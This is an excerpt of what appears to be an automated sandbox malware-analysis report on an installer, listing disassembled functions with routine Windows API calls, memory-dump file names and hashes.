                                                                                                                        • Opcode ID: 85fff42eb4710c21a338b83525f05a6dc1cef885663bff7e859abd0f709aa0b8
                                                                                                                        • Instruction ID: 31beaa45f17b0c233e95511b1032f38239e2c3dd2f797580b0bfa52cd22bfeae
                                                                                                                        • Opcode Fuzzy Hash: 85fff42eb4710c21a338b83525f05a6dc1cef885663bff7e859abd0f709aa0b8
                                                                                                                        • Instruction Fuzzy Hash: 33E06D36B40125ABCA133B90FC09AEE3E789B05751B110075B919D71728E6108528BD4
                                                                                                                        Function 008566F0 Relevance: 7.6, APIs: 5, Instructions: 139COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete$ClientObjectRect
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1851782329-0
                                                                                                                        • Opcode ID: 9af07c092f74bc7799518079f70d12f7492d982cc522bc6bd722aece9162d1f1
                                                                                                                        • Instruction ID: 777d5d7264009be1b4ef07c12da6e36e4ab4df93a4a13a78809ae876d9e5a37f
                                                                                                                        • Opcode Fuzzy Hash: 9af07c092f74bc7799518079f70d12f7492d982cc522bc6bd722aece9162d1f1
                                                                                                                        • Instruction Fuzzy Hash: 30413A72104702AFD3219F64DD49F6BBBF9EB88711F504939FA56D31A0DB71E8098B21
                                                                                                                        Function 008569C0 Relevance: 7.6, APIs: 5, Instructions: 125windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMessageSendWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 799199299-0
                                                                                                                        • Opcode ID: f4ee693fb21965cc935ec0c315458b5918a5714bf37617d55b13acc58a4f2844
                                                                                                                        • Instruction ID: e66fccc5ad0c12670cc97293734b2f4f859af535301d1d8a6ea25fa507246872
                                                                                                                        • Opcode Fuzzy Hash: f4ee693fb21965cc935ec0c315458b5918a5714bf37617d55b13acc58a4f2844
                                                                                                                        • Instruction Fuzzy Hash: 3941D6323002169FC725CF68D894A76B7B5FB44353F88853AE845C7261E731E869DB60
                                                                                                                        Function 009599A0 Relevance: 7.6, APIs: 5, Instructions: 122COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 009599D4
                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 009599F6
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00959A1E
                                                                                                                        • std::_Facet_Register.LIBCPMT ref: 00959B07
                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00959B31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 459529453-0
                                                                                                                        • Opcode ID: 20af32033fac508c7c1375bcc0472248f23139ab27aff8edc2254594a8e9f856
                                                                                                                        • Instruction ID: 04b44b6ceacb6d330910a1c42ff3e5107d5eb8e1f3dc62da7044995f06d0aaf3
                                                                                                                        • Opcode Fuzzy Hash: 20af32033fac508c7c1375bcc0472248f23139ab27aff8edc2254594a8e9f856
                                                                                                                        • Instruction Fuzzy Hash: 6551CE71900245DFEF11CF98D985BAEBBB4FB00324F248159E815AB381EB75AA49CB91
                                                                                                                        Function 0086FB10 Relevance: 7.6, APIs: 5, Instructions: 109windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetFocus.USER32(00000000,?,?), ref: 0086FB88
                                                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0086FBD0
                                                                                                                        • SendMessageW.USER32(?,0000102C,000000FF,0000F000), ref: 0086FBEC
                                                                                                                        • SendMessageW.USER32(?,0000102B,000000FF,?), ref: 0086FC1E
                                                                                                                        • SetFocus.USER32(00000000,?,?), ref: 0086FC31
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Focus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3982298024-0
                                                                                                                        • Opcode ID: e6da2788a024053beb2270a2192854f0f195bef222a79ff689e23228c8387062
                                                                                                                        • Instruction ID: fbc52b317df28fa54d9319253a44c04a599527b496c0e18634f8b8b84d746aaa
                                                                                                                        • Opcode Fuzzy Hash: e6da2788a024053beb2270a2192854f0f195bef222a79ff689e23228c8387062
                                                                                                                        • Instruction Fuzzy Hash: 5F415B75900709EFDB20DFA8CD85AAABBF4FF48710F104629E925977A1DB70A941CF50
                                                                                                                        Function 0095C870 Relevance: 7.6, APIs: 6, Instructions: 106memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Local$Free$ErrorLast$Alloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3879364810-0
                                                                                                                        • Opcode ID: b2d129c31e72d896ac12c4ab3cfda15b3326412644776ae2e5be784d3c45cb7f
                                                                                                                        • Instruction ID: edcc4d93dc4b085082094f3846301fa111777a2fbdad7bdeaae2b49c0a3c28fb
                                                                                                                        • Opcode Fuzzy Hash: b2d129c31e72d896ac12c4ab3cfda15b3326412644776ae2e5be784d3c45cb7f
                                                                                                                        • Instruction Fuzzy Hash: BB3106B16007019FDB20DF7AD845B67B7E8FF44711F00493EEA46C2650EB74E8099BA1
                                                                                                                        Function 008509E0 Relevance: 7.6, APIs: 5, Instructions: 60memorywindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00850A2A
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00850A30
                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 00850A53
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00A3FCB6,000000FF), ref: 00850A7B
                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00A3FCB6,000000FF), ref: 00850A81
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1606019998-0
                                                                                                                        • Opcode ID: cd2f104302b26f7f99d62fc5131575797958f32021316525ee5aac38d01bf49e
                                                                                                                        • Instruction ID: 872372b74a2685f44b138c7ac8bd4e5f4ed901935d1e022be1aa48c15b36ef69
                                                                                                                        • Opcode Fuzzy Hash: cd2f104302b26f7f99d62fc5131575797958f32021316525ee5aac38d01bf49e
                                                                                                                        • Instruction Fuzzy Hash: 7F1130B1E44359ABEB10DFA4DD06FAFBBB8FB04B04F100519F910A72C1D7B59A048B95
                                                                                                                        Function 00868330 Relevance: 7.6, APIs: 5, Instructions: 58windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0086833B
                                                                                                                        • SendMessageW.USER32(?,?,?,0000102B), ref: 00868398
                                                                                                                        • SendMessageW.USER32(?,?,?,0000102B), ref: 008683E7
                                                                                                                        • SendMessageW.USER32(?,00001043,00000000,00000000), ref: 008683F8
                                                                                                                        • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00868405
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 312131281-0
                                                                                                                        • Opcode ID: a320d8d153917dfa1c057eb2ad865a0c00f141d7eeefb2f60d3b862b2d527b67
                                                                                                                        • Instruction ID: 9d039856403381c65c20fe2e4bbce305834ece23066e89ea4d5bdf392f976da8
                                                                                                                        • Opcode Fuzzy Hash: a320d8d153917dfa1c057eb2ad865a0c00f141d7eeefb2f60d3b862b2d527b67
                                                                                                                        • Instruction Fuzzy Hash: 99215131918346AAD220DF11CD44B1ABBF5FFED758F206B1EF1D4211A4EBF191848E86
                                                                                                                        Function 0084D3EE Relevance: 7.5, APIs: 5, Instructions: 46synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?), ref: 0084D3F1
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 0084D40E
                                                                                                                        • GetLastError.KERNEL32 ref: 0084D418
                                                                                                                        • GetLastError.KERNEL32 ref: 0084D42F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CodeExitObjectProcessSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 590199018-0
                                                                                                                        • Opcode ID: f9eed7e7523aa98b0e7b58d1230a7e6a07d8fa0482c9546c99d10508d1f79640
                                                                                                                        • Instruction ID: fbbb32cd29f7f179a038ad12234dac9a033eaa88685307fccf46ba58d15f014b
                                                                                                                        • Opcode Fuzzy Hash: f9eed7e7523aa98b0e7b58d1230a7e6a07d8fa0482c9546c99d10508d1f79640
                                                                                                                        • Instruction Fuzzy Hash: 14014032A00609CFDB109FACDC04669BBB9FF44371B144766D825E32A1FB35AC628A94
                                                                                                                        Function 00874350 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 314windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • CreateWindowExW.USER32(?,RichEdit20W,?,?,?,?,?,?,00000000,00000000,00000000), ref: 008744FC
                                                                                                                        • SendMessageW.USER32(00000000,00000031,00000000,00000000), ref: 00874511
                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00874519
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$AllocateCreateHeapWindow
                                                                                                                        • String ID: RichEdit20W
                                                                                                                        • API String ID: 2359350451-4173859555
                                                                                                                        • Opcode ID: 309f6e47b8e2adbcc570dc86fbddd27983e38097d0a083f8244b5aa222ea8d2f
                                                                                                                        • Instruction ID: 3eec3df16096949ea32a98e2c4ec90834109893de2cf5e9457fb2cdf2ae74f84
                                                                                                                        • Opcode Fuzzy Hash: 309f6e47b8e2adbcc570dc86fbddd27983e38097d0a083f8244b5aa222ea8d2f
                                                                                                                        • Instruction Fuzzy Hash: A9B18C71A012099FDB15CFA8C994BEEBBF4FF48710F144269E819EB291DB71AD00CB64
                                                                                                                        Function 0086E930 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 226windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                          • Part of subcall function 0093EE40: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037,?,?,?,000000EF,?,00867908,00000000,80004005), ref: 0093EEA8
                                                                                                                          • Part of subcall function 0093EE40: SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0093EED8
                                                                                                                        • SendMessageW.USER32(?,00001036,00000004,00000004), ref: 0086EAED
                                                                                                                        • SendMessageW.USER32(?,00001036,00000400,00000400), ref: 0086EB04
                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,?), ref: 0086EB60
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$AllocateHeapWindow
                                                                                                                        • String ID: QuickSelectionList
                                                                                                                        • API String ID: 3168177373-3633591268
                                                                                                                        • Opcode ID: a4690c3a8fe4627ba3fe041a1955da233edf02189fef8d583178e795d5489328
                                                                                                                        • Instruction ID: 0c5a7ca973e4504737239394bef55745d1a0f73130c48d3640b3c11ea69ebc2f
                                                                                                                        • Opcode Fuzzy Hash: a4690c3a8fe4627ba3fe041a1955da233edf02189fef8d583178e795d5489328
                                                                                                                        • Instruction Fuzzy Hash: D881BD75A00209AFDB14DF68C884BAAF7F5FF88314F104659E515AB290DB74AD04CFA1
                                                                                                                        Function 009A4A90 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 167synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,C7BA013E), ref: 009A4AC4
                                                                                                                          • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,00000000,00000000,00000000,00AAC2BE,?,00986984,00AAC2BE), ref: 00949618
                                                                                                                          • Part of subcall function 00949600: MultiByteToWideChar.KERNEL32(00000003,00000000,00986984,000000FF,?,-00000001,?,00986984,00AAC2BE), ref: 0094964A
                                                                                                                          • Part of subcall function 0084A8A0: RtlAllocateHeap.NTDLL(?,00000000,?,C7BA013E,00000000,00A3DE90,000000FF,?,?,00B277EC,?,009A5D66,8000000B,C7BA013E), ref: 0084A8EA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
                                                                                                                        • String ID: *.*$.jar$.pack
                                                                                                                        • API String ID: 2019434529-3892993289
                                                                                                                        • Opcode ID: 2fe0e6b6364a4e2402cd435ade918d8482a37c63074fa621dc78a206075382ae
                                                                                                                        • Instruction ID: 64a2eb1f0aa6afb7f230763ea0ec89557f2af53f5ffc4b61cc0f3c699011aa44
                                                                                                                        • Opcode Fuzzy Hash: 2fe0e6b6364a4e2402cd435ade918d8482a37c63074fa621dc78a206075382ae
                                                                                                                        • Instruction Fuzzy Hash: 19518170A0161A9FDB10DFA9C848BAEB7B8FF45324F104269E425EB291DB74D900CBE1
                                                                                                                        Function 00850DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00850DF2
                                                                                                                        • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00850DF8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoOriginateLanguageException$combase.dll
                                                                                                                        • API String ID: 2574300362-3996158991
                                                                                                                        • Opcode ID: 7d82d2e204f06bc42400d9e9955639f6a99659f3c73af798c6cecfe103721c13
                                                                                                                        • Instruction ID: ea127499c357e99d54808186579bc704e8a717d5e3440b935e7525bf691bdcb3
                                                                                                                        • Opcode Fuzzy Hash: 7d82d2e204f06bc42400d9e9955639f6a99659f3c73af798c6cecfe103721c13
                                                                                                                        • Instruction Fuzzy Hash: 3C314F71900209DFDB20DFA8C956BEEBBF4FB04714F200A29E814E72D1EB745A48CB91
                                                                                                                        Function 00859560 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • EnterCriticalSection.KERNEL32(00B3683C), ref: 0085959C
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 008595B0
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B3683C), ref: 008595EF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.2894907432.0000000000841000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00840000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.2894858257.0000000000840000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895305129.0000000000A9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895445176.0000000000B2C000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895464968.0000000000B2E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895505328.0000000000B2F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        • Associated: 00000003.00000002.2895568132.0000000000B3A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_3_2_840000_SandeLLoCHECKER_Installer.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$CurrentEnterLeaveThread
                                                                                                                        • String ID: v
                                                                                                                        • API String ID: 2351996187-3261393531
                                                                                                                        • Opcode ID: a5bb216c033857f5d68f7a98a8b6b3e3722964f1a52f908ce87df0a986e27262
                                                                                                                        • Instruction ID: e93cb544a6308a3f554934d976537e29736748e698067f8dd8aa0f0e43c6261a
                                                                                                                        • Opcode Fuzzy Hash: a5bb216c033857f5d68f7a98a8b6b3e3722964f1a52f908ce87df0a986e27262
                                                                                                                        • Instruction Fuzzy Hash: 1E11E235A04204EFCB21CF69C804B1ABBE8FB48715F2482AED856D7390EB729809C790
                                                                                                                        Function 00A1AB3C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
